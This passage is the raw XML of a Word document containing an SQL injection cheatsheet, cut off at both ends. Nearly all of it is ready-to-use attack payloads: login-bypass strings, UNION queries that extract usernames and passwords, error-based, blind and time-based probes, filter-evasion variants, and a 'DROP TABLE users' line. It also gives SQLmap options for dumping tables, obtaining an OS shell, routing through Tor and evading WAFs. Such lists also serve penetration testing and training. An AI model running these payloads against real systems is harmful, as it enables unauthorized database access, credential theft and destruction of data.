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Injection (SQLi) Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This cheatsheet provides practical SQL Injection payloads, methodologies, and tool usage. It includes manual testing payloads, automated tools like SQLmap, and advanced evasion techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Basic SQLi Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>These are the first payloads to test for injection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR 'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>admin'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1' OR '1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' UNION SELECT NULL, NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Authentication Bypass Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>admin' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>admin' #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' or 'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. UNION-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Union-based SQLi is used to extract data by combining results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' UNION SELECT null,null--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' UNION SELECT username,password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' UNION SELECT table_name,null FROM information_schema.tables--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Error-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Error messages can reveal valuable information:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' AND 1=CONVERT(int, (SELECT @@version))--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' AND 1=CAST((SELECT user()) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Blind SQLi is used when no errors are shown:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' AND 1=1-- (True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' AND 1=2-- (False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR SLEEP(5)-- (Time-based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. SQLmap Tool Usage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQLmap automates SQL injection attacks. Below are important options:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>-u URL → Target URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--dbs → Enumerate available databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--tables -D dbname → List tables of a database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--columns -T tablename -D dbname → List columns of a table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--dump -T tablename -D dbname → Dump data from a table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--level=5 --risk=3 → Increase testing depth (more payloads, riskier)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--os-shell → Get interactive OS shell via SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--batch → Run without asking user confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--tor → Route traffic through TOR for anonymity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>--tamper=between → Use tamper scripts to evade WAF/IDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Advanced Evasion Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Payloads to bypass filters and WAF:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>admin'/**/OR/**/'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>' OR '1'='1' { %00 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1; DROP TABLE users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>'/*!50000 UNION SELECT user,password FROM users*/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